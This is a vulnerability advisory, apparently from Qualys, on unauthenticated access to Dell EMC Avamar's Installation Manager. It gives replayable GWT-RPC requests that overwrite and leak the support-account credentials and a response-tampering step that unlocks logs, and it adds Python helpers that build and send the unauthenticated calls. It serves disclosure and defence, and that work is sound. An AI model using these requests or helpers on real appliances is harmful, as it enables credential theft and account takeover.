Qualys Security Advisory QSA-2017-11-24 


November 24, 2017 


Dell EMC Avamar and Integrated Data Protection Appliance (IDPA) Installation Manager Missing Access Control Vulnerability


SYNOPSIS: 


Dell EMC Avamar and Integrated Data Protection Appliance (IDPA) suffer from multiple vulnerabilities in the Avamar 
Installation Manager, some of which can be exploited by an unauthenticated remote user. 


Reference: https://store.emc.com/en-us/AVAMAR-PRODUCTS/Dell-EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/EMC-Avamar-Virtual-Edition 


CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1217 


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target: Dell EMC Avamar Virtual Edition 
2. Target IP Address: 10.113.198.230 


Vulnerable/Tested Version: 


Dell EMC Avamar Server 7.3.1 
Dell EMC Avamar Server 7.4.1 
Dell EMC Avamar Server 7.5.0 
Dell EMC Integrated Data Protection Appliance 2.0 
Dell EMC Integrated Data Protection Appliance 2.1 


Avamar Installation Manager (as reported by the target): 


Host Server: 10.113.198.230 
Product Info: Avamar 7.5.0-183 
Installation Manager Version: 7.5.0.183 
Downloader Service: (Not configured) 


Vulnerability 1: Missing functional-level access control allows an unauthenticated user to add a Dell 
EMC Support Account to the Installation Manager (CVE-2018-1217) 


Dell EMC Avamar fails to restrict access to the Configuration section of the Installation Manager, which lets 
administrators set up the Installation Manager configuration (including the Online Support account and proxy 
settings) or check for new packages on the Online Support site. The GWT-RPC endpoint behind that page, 
POST /avi/avigui/avigwt, accepts the saveLDLSConfig call without any session cookie. 


Risk Factor: High 


Impact: 


An unauthenticated, remote attacker could add or replace the Dell EMC Online Support account stored in the 
Installation Manager without any user interaction. 


CVSS Score: AV:N/AC:L/Au:N/C:P/I:N/A:N 


Proof-Of-Concept: 


1. Check or confirm the existing settings in the Configuration section: 


[Screenshot: Avamar Installation Manager, tabs "SW Releases | History | Repository | Configuration". The 
Configuration page ("This page lets you set up Installation Manager configurations, or check for new packages 
from the Online Support site.") shows Username: EMC-Supportxxx, Password: (masked), Proxy Server Settings with 
"Enable proxy" unchecked, empty Proxy Host / Proxy Port, "Use Authentication" unchecked with empty Username / 
Password, and the buttons Save and "Check For New Packages".] 


2. Replay the following request in Burp Suite with the session cookie (JSESSIONID) removed: 


Request: 

POST /avi/avigui/avigwt HTTP/1.1 
Host: 10.113.198.230 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: text/x-gwt-rpc; charset=utf-8 
X-GWT-Module-Base: https://10.113.198.230/avi/avigui/ 
Referer: https://10.113.198.230/avi/avigui.html 
Content-Length: 454 
Connection: close 

7|0|7|https://10.113.198.230/avi/avigui/|60AF6BC6976F5B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611|10.113.198.230|{"proxyHost":null,"proxyPort":0,"useProxyAuthentication":false,"proxyUsername":null,"proxyPassword":null,"disableInternetAccess":false,"proxyEnable":false,[fields cropped in screenshot]"disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7| 

(The body is longer than what the screenshot shows: Content-Length is 454 bytes and the middle of the JSON is 
cropped. That is where the support-account fields sit; they are visible as "emcsuppo..." in the response under 
Vulnerability 2.) 

Response: 

HTTP/1.1 200 OK 
Date: Fri, 24 Nov 2017 05:50:43 GMT 
Server: Jetty(9.0.6.v20130930) 
X-Frame-Options: SAMEORIGIN 
Content-Type: application/json; charset=utf-8 
Content-Disposition: attachment 
Content-Length: 16 
Connection: close 

//OK[1,[""],0,7] 


Note: The request is still processed successfully when the X-GWT-Permutation header is altered (or, as above, 
omitted entirely), so the per-build permutation hash is no obstacle to a crafted client. 


3. Confirm that the user 'hacker' has been added: 


[Screenshot: the Configuration page now shows Username: hacker and a masked Password. The proxy settings are 
unchanged ("Enable proxy" unchecked, empty Proxy Host / Proxy Port, "Use Authentication" unchecked with empty 
Username / Password); buttons Save and "Check For New Packages".] 


Vulnerability 2: Missing functional-level access control allows an unauthenticated user to retrieve the 
Dell EMC Support Account credentials in plain text (CVE-2018-1217) 


Dell EMC Avamar fails to restrict access to the Configuration section of the Installation Manager, which lets 
administrators set up the Installation Manager configuration or check for new packages on the Online Support 
site. The same unauthenticated GWT-RPC endpoint returns the stored configuration, including the Online Support 
account password, in clear text. 


Risk Factor: High 


Impact: 


An unauthenticated, remote attacker could retrieve the Online Support account password in plain text. 


CVSS Score: AV:N/AC:L/Au:N/C:P/I:N/A:N 


Proof-Of-Concept: 


1. Check or confirm the existing settings in the Configuration section: 


[Screenshot: Avamar Installation Manager, Configuration tab ("This page lets you set up Installation Manager 
configurations, or check for new packages from the Online Support site."). Username: EMC-Supportxxx, Password: 
(masked), Proxy Server Settings with "Enable proxy" unchecked, empty Proxy Host / Proxy Port, "Use 
Authentication" unchecked with empty Username / Password, and the button "Check For New Packages".] 


2. Replay the following request in Burp Suite with the session cookie removed (this capture is from a second 
lab host, 10.11.42.110, taken on 23 Jan 2018): 


Request: 

POST /avi/avigui/avigwt HTTP/1.1 
Host: 10.11.42.110 
Connection: Keep-Alive 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 
Accept: */* 
Content-Type: text/x-gwt-rpc; charset=utf-8 
X-GWT-Permutation: D0386544BCA6922FF33178722F891345 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
DNT: 1 
Content-Length: 192 

7|0|6|https://10.11.42.110/avi/avigui/|60AF6BC6976F5B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|[method name cropped in screenshot]|java.lang.String/2004016611|10.11.42.110|1|2|3|4|[trailer illegible in screenshot] 

Response: 

HTTP/1.1 200 OK 
Date: Tue, 23 Jan 2018 06:08:36 GMT 
Server: Jetty(9.0.6.v20130930) 
X-Frame-Options: SAMEORIGIN 
Content-Type: application/json; charset=utf-8 
Content-Disposition: attachment 
Content-Length: 283 
Keep-Alive: timeout=15, max=100 
Connection: Keep-Alive 

//OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsuppo[cropped in screenshot]\",\"disableLDLS\":false}"],0,7] 


Note: The request is still processed successfully when the X-GWT-Permutation header is altered. 


As the response above shows, the stored configuration, including the support account password, is returned in 
plain text to a caller that presented no session at all. 
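The two PoCs above are the same operation in different directions: encode a GWT-RPC call to AvinstallerService without a session, and decode the //OK[...] reply. The following helpers are an added example written for this page, not Qualys or Dell EMC code. The service name, the java.lang.String type token, the string-table layout and the saveLDLSConfig / supportLogin method names are copied from the captured requests; the strong-name hash and the X-GWT-Permutation value are per-build values that must be read from the target's avigui.nocache.js or a captured request (placeholders are used here); the name of the configuration-read method is not legible in the screenshot, so the block only decodes that call's response, using a sample constructed from the visible fields.

```python
"""GWT-RPC helpers for the Avamar Installation Manager endpoint /avi/avigui/avigwt.

Added example for this advisory (not Qualys or Dell EMC code). The wire format
is the public GWT-RPC v7 text format; everything Avamar-specific below was
copied from the requests in the advisory. Strong name and permutation values
are placeholders that must be replaced by the target's own.
"""
import http.client
import json
import ssl

ENDPOINT = "/avi/avigui/avigwt"
SERVICE = "com.avamar.avinstaller.gwt.shared.AvinstallerService"
STRING_TYPE = "java.lang.String/2004016611"   # type token seen in the captures


def _escape(s):
    # GWT's client serializer escapes '\' as '\\' and the field separator '|' as '\!'.
    return s.replace("\\", "\\\\").replace("|", "\\!")


def encode_gwt_rpc(module_base, strong_name, method, params):
    """Build a GWT-RPC v7 body for AvinstallerService.<method>(String, ...).

    params: list of str or None (None is sent as the null index 0). Every
    parameter is typed java.lang.String, matching saveLDLSConfig and
    supportLogin in the captured requests.
    """
    table = []

    def intern(s):                      # 1-based index into the string table
        if s not in table:
            table.append(s)
        return table.index(s) + 1

    header = [intern(module_base), intern(strong_name), intern(SERVICE), intern(method)]
    type_idx = intern(STRING_TYPE)
    values = [0 if p is None else intern(p) for p in params]
    fields = (["7", "0", str(len(table))]            # version, flags, table size
              + [_escape(s) for s in table]
              + [str(i) for i in header]
              + [str(len(params))]
              + [str(type_idx)] * len(params)
              + [str(v) for v in values])
    return "|".join(fields) + "|"


def decode_gwt_rpc_response(text):
    """Parse '//OK[...]' into (version, flags, string_table, payload_tokens).

    The array is written back to front: the last three elements are version,
    flags and string table; what precedes them is the return value, reversed.
    """
    if text.startswith("//EX"):
        raise RuntimeError("server-side exception: " + text[4:])
    if not text.startswith("//OK"):
        raise ValueError("not a GWT-RPC response: " + text[:20])
    stream = json.loads(text[4:])
    version, flags, table = stream[-1], stream[-2], stream[-3]
    return version, flags, table, stream[:-3][::-1]


def returned_string(text):
    """Return value of a String-returning method (index 0 means null)."""
    _, _, table, payload = decode_gwt_rpc_response(text)
    return None if payload[0] == 0 else table[payload[0] - 1]


def save_ldls_config_body(host, strong_name, config):
    """Body of the unauthenticated saveLDLSConfig call from Vulnerability 1."""
    payload = json.dumps(config, separators=(",", ":"))
    return encode_gwt_rpc("https://%s/avi/avigui/" % host, strong_name,
                          "saveLDLSConfig", [host, None, payload])


def config_from_response(text):
    """Vulnerability 2: the returned String is itself the configuration JSON."""
    return json.loads(returned_string(text))


def send_gwt_rpc(host, body, permutation, timeout=10):
    """POST the body with no Cookie header (only against hosts you may test).
    Appliance certificates are usually self-signed, so verification is off."""
    ctx = ssl._create_unverified_context()
    conn = http.client.HTTPSConnection(host, 443, context=ctx, timeout=timeout)
    headers = {"Content-Type": "text/x-gwt-rpc; charset=utf-8",
               "X-GWT-Module-Base": "https://%s/avi/avigui/" % host,
               "X-GWT-Permutation": permutation,   # any value is accepted per the advisory
               "Connection": "close"}
    conn.request("POST", ENDPOINT, body=body.encode("utf-8"), headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


# Constructed samples: the proxy fields visible in the captures, nothing more.
SAMPLE_CONFIG = {"proxyHost": None, "proxyPort": 0, "useProxyAuthentication": False,
                 "proxyUsername": None, "proxyPassword": None,
                 "disableInternetAccess": False, "proxyEnable": False, "disableLDLS": False}
SAMPLE_READ_RESPONSE = (
    '//OK[1,["{\\"proxyHost\\":null,\\"proxyPort\\":0,\\"useProxyAuthentication\\":false,'
    '\\"proxyUsername\\":\\"\\",\\"proxyPassword\\":\\"\\",\\"disableInternetAccess\\":false,'
    '\\"proxyEnable\\":false,\\"disableLDLS\\":false}"],0,7]')

if __name__ == "__main__":
    print(save_ldls_config_body("10.113.198.230", "0" * 32, SAMPLE_CONFIG))
    print(config_from_response(SAMPLE_READ_RESPONSE))
    print(returned_string('//OK[1,["false"],0,7]'))
```

The trailer `|1|2|3|4|3|5|5|5|6|0|7|` that the encoder produces is the one in the captured saveLDLSConfig request: module base, strong name, interface and method indices, three parameters all typed String, then the host, a null and the JSON. A patched appliance should answer the cookie-less call with something other than a 200 and a successful `//OK` stream.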


Vulnerability 3: Improper validation of the Dell EMC Customer Support passcode allows an 
authenticated user to unlock the Dell EMC Support Account and download verbose logs 


Dell EMC Avamar fails to validate the Customer Support passcode properly: the result of the supportLogin 
call is enforced only in the browser-side UI. An authenticated user who rewrites the server's "false" reply to 
"true" in an intercepting proxy unlocks the support features and can view and download the verbose logs that 
the passcode is meant to protect. 


Risk Factor: Medium 


Impact: 


An authenticated user could exploit this vulnerability to unlock the Dell EMC support account and access verbose 
logs that are deliberately restricted to support staff. 


CVSS Score: AV:N/AC:L/Au:S/C:N/I:N/A:N 


Proof-Of-Concept: 


1. Try to unlock the support account with an invalid passcode; the UI reports an error: 


[Screenshot: Avamar Installation Manager, SW Releases tab ("Step 1: Package Selection > Step 2: Installation 
Setup > Step 3: Installation Progress"; "Select a package, and then click the appropriate button to proceed. 
Note: For Support-Only packages, the action buttons will be disabled for Non-Support users."). The Passcode 
dialog ("Type the Customer Support passcode:", OK / Cancel) is followed by the warning "Customer Support access 
denied."] 


2. Send the same request again with Burp intercept enabled. The invalid passcode is the last string in the body: 


Request to https://10.113.198.230:443 

POST /avi/avigui/avigwt HTTP/1.1 
Host: 10.113.198.230 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: text/x-gwt-rpc; charset=utf-8 
X-GWT-Permutation: C0386544BCAE522FF33178722F95C424 
X-GWT-Module-Base: https://10.113.198.230/avi/avigui/ 
Referer: https://10.113.198.230/avi/avigui.html 
Content-Length: 216 
Cookie: JSESSIONID=[session id, illegible in screenshot] 
Connection: close 

7|0|7|https://10.113.198.230/avi/avigui/|60AF6BC6976F5B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611|10.113.198.230|adsai|1|2|3|4|3|5|5|5|6|0|7| 

(String 7, "adsai" as typed, is the invalid passcode; it is the third String parameter of supportLogin.) 


3. Intercept the server response: 


Response from https://10.113.198.230:443/avi/avigui/avigwt 

HTTP/1.1 200 OK 
Date: Fri, 24 Nov 2017 04:29:22 GMT 
Server: Jetty(9.0.6.v20130930) 
X-Frame-Options: SAMEORIGIN 
Content-Type: application/json; charset=utf-8 
Content-Disposition: attachment 
Content-Length: 21 
Connection: close 

//OK[1,["false"],0,7] 


4. Change the returned value from "false" to "true" before forwarding the response: 


Response from https://10.113.198.230:443/avi/avigui/avigwt (modified) 

HTTP/1.1 200 OK 
Date: Fri, 24 Nov 2017 04:29:22 GMT 
Server: Jetty(9.0.6.v20130930) 
X-Frame-Options: SAMEORIGIN 
Content-Type: application/json; charset=utf-8 
Content-Disposition: attachment 
Content-Length: 21 
Connection: close 

//OK[1,["true"],0,7] 


5. The UI unlocks the support account. 


6. View the logs: 


With the support account unlocked, the log viewer at https://10.113.198.230:7543/avi/logapp.html serves 
avinstaller.log.0: 

Copying getnodelogs script to nodes 
node [] not responsive, removing from list - no network interfaces are tagged for internal use or are otherwise unrestricted on node at index 0 among nodes selected by "all" 
ERROR: there were no responsive nodes, stopped at /usr/local/avamar/bin/mapall line 124. 
getlogs: ERROR: command "[ -r /etc/profile ] && . /etc/profile >/dev/null 2>&1 ; cd /usr/local/avamar/bin/; mapall --nodes=all --parallel --user=root --quiet copy getnodelogs" exited with error status = 255 - quitting 
ERROR: command "[ -r /etc/profile ] && . /etc/profile >/dev/null 2>&1 ; ssh-agent bash -c \"[ -r /etc/profile ] && . /etc/profile >/dev/null 2>&1 ; ssh-add /root/.ssh/rootid && /usr/local/avamar/bin/getlogs --_rerun_ssh_agent\"" exited with error status = 1 - quitting 
Nov 24, 2017 4:18:51 AM com.avamar.avinstaller.report.NodeLogsServlet executeGetLogs 
WARNING: Node log file not found after running getlogs. 
Nov 24, 2017 4:18:51 AM com.avamar.avinstaller.report.NodeLogsServlet doPost 
WARNING: Node log file not found after running getlogs. 
Nov 24, 2017 4:18:51 AM com.avamar.avinstaller.gwt.server.AvinstallerServiceImpl callService 
WARNING: ----- exception in callService: http://localhost:7580/avi/nodeLogs msg: http://localhost:7580/avi/nodeLogs 
Nov 24, 2017 4:18:51 AM com.avamar.avinstaller.gwt.server.AvinstallerServiceImpl handleServiceException 
INFO: FileNotFoundException (most likely the diff in versions of API) 
Nov 24, 2017 4:25:16 AM com.avamar.avinstaller.gwt.server.GWTCacheControlFilter doFilter 
INFO: ---- requestURI: /avi/avigui/avigui.nocache.js 
Nov 24, 2017 4:25:17 AM com.avamar.avinstaller.gwt.server.AvinstallerServiceImpl getSysInfo 
INFO: [aviguiserv:getSysInfo] http://localhost:7580/avi/service/info/sysinfo/product calling with param: product 
Nov 24, 2017 4:25:17 AM com.avamar.avinstaller.gwt.server.AvinstallerServiceImpl callService 
INFO: [aviguiserv:10.113.198.230] making rest call: http://localhost:7580/avi/service/info/sysinfo/product 
Nov 24, 2017 4:25:17 AM com.avamar.avinstaller.security.GPGSign callGPGCommand 
INFO: Command: gpg --verify /opt/emc-tools/bin/sys-info.sig /opt/emc-tools/bin/sys-info returned: gpg: Signature made Mon 12 Jun 2017 11:40:15 PM UTC using RSA key ID 54892BD5 
gpg: Good signature from "avpkey (Avamar Package Key)" 
gpg: WARNING: This key is not certified with a trusted signature! 
gpg: There is no indication that the signature belongs to the owner. 
Primary key fingerprint: E066 D6AB 7A03 A9F5 014E 529A A712 7C33 5489 2BD5 
Nov 24, 2017 4:25:17 AM com.avamar.avinstaller.security.GPGSign callGPGCommand 

Even though this getlogs run failed, the exposed log already discloses internal detail a non-support user is 
not meant to see: the node-management tooling (mapall, getlogs) runs as root over SSH using the key 
/root/.ssh/rootid, the internal REST API listens on http://localhost:7580/avi/, and the package-signing key 
fingerprint is recorded. 


7. View verbose logs. The viewer's service endpoint (https://10.113.198.230:7543/avi/ser, URL cut off in the 
screenshot) returns the file metadata followed by the full 19,115-line log: 

{"status":"","fileName":"avinstaller.log.0","fileSize":"1687603","lineCount":"19115","lineStart":"1","lineEnd":"19115"} 

Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment <clinit> 
INFO: Hibernate 3.3.1.GA 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment <clinit> 
INFO: hibernate.properties not found 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment buildBytecodeProvider 
INFO: Bytecode provider name : javassist 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Environment <clinit> 
INFO: using JDK 1.4 java.sql.Timestamp handling 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Configuration configure 
INFO: configuring from resource: jbpm.hibernate.cfg.xml 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Configuration getConfigurationInputStream 
INFO: Configuration resource: jbpm.hibernate.cfg.xml 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.Configuration addResource 
INFO: Reading mappings from resource : jbpm.repository.hbm.xml 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.repository.DeploymentImpl -> JBPM4_DEPLOYMENT 
Jun 13, 2017 1:21:11 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.repository.DeploymentProperty -> JBPM4_DEPLOYPROP 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.id.PropertyImpl -> JBPM4_PROPERTY 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.Configuration addResource 
INFO: Reading mappings from resource : jbpm.execution.hbm.xml 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.model.ExecutionImpl -> JBPM4_EXECUTION 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindRootPersistentClassCommonValues 
INFO: Mapping class: org.jbpm.pvm.internal.type.Variable -> JBPM4_VARIABLE 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindSubclass 
INFO: Mapping subclass: org.jbpm.pvm.internal.type.variable.BlobVariable -> JBPM4_VARIABLE 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindSubclass 
INFO: Mapping subclass: org.jbpm.pvm.internal.type.variable.DateVariable -> JBPM4_VARIABLE 
Jun 13, 2017 1:21:12 AM org.hibernate.cfg.HbmBinder bindSubclass 
INFO: Mapping subclass: org.jbpm.pvm.internal.type.variable.DoubleVariable -> JBPM4_VARIABLE 
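Steps 2 to 7 above work because the only thing that changes when the reply is rewritten is the browser's idea of whether the support account is unlocked; the log servlet on port 7543 never asks the server whether the passcode was actually accepted. The following model of that flow is an added example, not Avamar code: the passcode, session store, log lines and the two servlet variants are constructed, and the GWT-RPC string "false"/"true" and the tamper step are the ones from the PoC. It shows the vulnerable shape (the servlet trusts the UI gate) next to the hardened one (the unlock is recorded server-side at supportLogin time and re-checked on every log request).

```python
"""Where the support unlock must be enforced (added example, not Avamar code).

Models the supportLogin -> node-log flow from Vulnerability 3. The server
answers the call with the GWT-RPC String "false" for a wrong passcode; the
PoC rewrites it to "true" in the intercepting proxy and the browser-side UI
unlocks. Whether that buys anything depends only on what the log servlet
checks. Passcode, session store, log lines and function names are constructed.
"""
import hmac
import json
import secrets

SUPPORT_PASSCODE = b"lab-passcode-not-real"      # constructed placeholder
SESSIONS = {}                                    # JSESSIONID -> server-side state
LOG_LINES = ["Copying getnodelogs script to nodes",
             "ERROR: there were no responsive nodes"]   # constructed sample


def rpc_string(text):
    """Minimal reader for a String-returning GWT-RPC reply //OK[idx,[strings],flags,version]."""
    stream = json.loads(text[len("//OK"):])
    return stream[-3][stream[0] - 1]


def new_session():
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"support_unlocked": False}
    return sid


def support_login(sid, passcode):
    """Server side of AvinstallerService.supportLogin.

    The outcome is recorded in the server-side session before the reply is
    sent, so a tampered reply cannot change what the server believes."""
    ok = hmac.compare_digest(passcode.encode(), SUPPORT_PASSCODE)
    if ok:
        SESSIONS[sid]["support_unlocked"] = True
    return '//OK[1,["%s"],0,7]' % ("true" if ok else "false")


def tamper(response_text):
    """The Burp 'intercept response' step of the PoC: "false" -> "true"."""
    return response_text.replace('["false"]', '["true"]')


class BrowserUi:
    """The GWT front end: its unlocked state is whatever the reply said."""

    def __init__(self, sid):
        self.sid = sid
        self.unlocked = False

    def unlock(self, passcode, proxy=None):
        reply = support_login(self.sid, passcode)
        if proxy is not None:
            reply = proxy(reply)
        self.unlocked = rpc_string(reply) == "true"
        return self.unlocked

    def view_logs(self, servlet):
        # The UI only offers the log viewer once it believes it is unlocked.
        return servlet(self.sid) if self.unlocked else None


def node_logs_vulnerable(sid):
    """Log servlet that assumes the UI already gated access (the reported behaviour)."""
    return LOG_LINES


def node_logs_hardened(sid):
    """Log servlet that re-checks the server-recorded unlock (None stands for HTTP 403)."""
    state = SESSIONS.get(sid)
    if not state or not state["support_unlocked"]:
        return None
    return LOG_LINES


def demo():
    """Returns (tampered vs vulnerable, tampered vs hardened, direct call, real unlock vs hardened)."""
    ui = BrowserUi(new_session())
    ui.unlock("wrong", proxy=tamper)
    tampered_vulnerable = ui.view_logs(node_logs_vulnerable)
    tampered_hardened = ui.view_logs(node_logs_hardened)
    direct_vulnerable = node_logs_vulnerable("no-such-session")   # skip the UI entirely
    ui.unlock(SUPPORT_PASSCODE.decode())
    real_hardened = ui.view_logs(node_logs_hardened)
    return tampered_vulnerable, tampered_hardened, direct_vulnerable, real_hardened


if __name__ == "__main__":
    print(demo())
```

The third value returned by demo() is the point to remember when testing a fix: with the vulnerable servlet the tampering is not even needed, because anyone with a session can request the log resource directly. The hardened variant only helps if every resource behind the support gate (the log viewer and its service endpoint on port 7543 included) performs the same server-side check.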


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


